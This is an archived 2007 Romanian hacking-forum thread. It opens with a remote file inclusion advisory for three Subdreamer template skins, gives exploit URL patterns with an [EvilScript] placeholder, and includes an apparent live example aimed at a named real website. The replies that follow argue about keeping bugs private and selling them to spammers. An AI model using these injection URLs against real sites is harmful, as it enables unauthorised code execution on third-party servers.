kw3rln Posted May 24, 2007 Report Posted May 24, 2007 exemplu: http://www.luchino.com.br/skins/bobbyzhuo/bobby1.php?pluginpath[0]=teeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeee---------------------------------------------------------------------------Subdreamer templates - Remote File Include Vulnerabilities---------------------------------------------------------------------------Discovered By fluffy_bunny [ Romanian Security Team ] : hTTp://RSTZONE.NET :Remote : YesCritical Level : Dangerous---------------------------------------------------------------------------Affected software description :~~~~~~~~~~~~~~~~~~~~~~~~~~~~~Subdreamer Skins: 1.bobbyzhuo 2.gate_to_americana 3.refresh------------------------------------------------------------------Exploit:~~~~~~~Variable $pluginpath[0] not sanitized.When register_globals=on an attacker can exploit this vulnerability with a simple php injection script.# http://www.site.com/[path]/skins/bobbyzhuo/bobby1.php?pluginpath[0]=[EvilScript]# http://www.site.com/[path]/skins/gate_to_americana/gta1.php?pluginpath[0]=[EvilScript]# http://www.site.com/[path]/skins/refresh/design1.php?pluginpath[0]=[EvilScript]---------------------------------------------------------------------------*/Contact:~~~~~~~Nick: fluffy_bunnyHomepage: hTTp://RSTZONE.NET [ in construction ]/*-------------------------------- [ EOF] ---------------------------------- Quote
Danny Posted May 24, 2007 Report Posted May 24, 2007 Bravo! Si ... let keep it inside ... in comunitatea RST Quote
Johnny Posted May 24, 2007 Report Posted May 24, 2007 buguri RFI is usor de gasit daca nu e variabila satinizata atunci e vulnerabil ..oricum iti apreciez efortul depus bvo Quote
Guest flama Posted May 24, 2007 Report Posted May 24, 2007 johnny ii apreciaza efortul lu kw3 .... hahahahahahaha ia posteaza shi tu 20 de rfi exploits 0day daca sunt asha ushor de gasit Quote
kw3rln Posted May 24, 2007 Author Report Posted May 24, 2007 le-am gasit din greseala cand ma uitam putin la subdreamer la cod Quote
Danny Posted May 24, 2007 Report Posted May 24, 2007 Vezi poate mai gasesti din greseala si alte vuln-uri Quote
Guest flama Posted May 25, 2007 Report Posted May 25, 2007 Vezi poate mai gasesti din greseala si alte vuln-uri Bravo! Si ... let keep it inside ... in comunitatea RST scarto daca imi dai voie sa citesc printre randuri shi sa traduc ce ai zis :SUNT SPAMER/ fac sendere php shi le vand shi vreau buguri php cat mai multe shi cat mai private ca sa nu se duca repede.right ? Quote
Danny Posted May 25, 2007 Report Posted May 25, 2007 Nu Nu prea obisnuiesc sa fac bani pe net .. si sincer nu stiu ce prost ar cumpara buguri php cand le poate gasi si el aici pe forum sau pe alte forumuri Quote
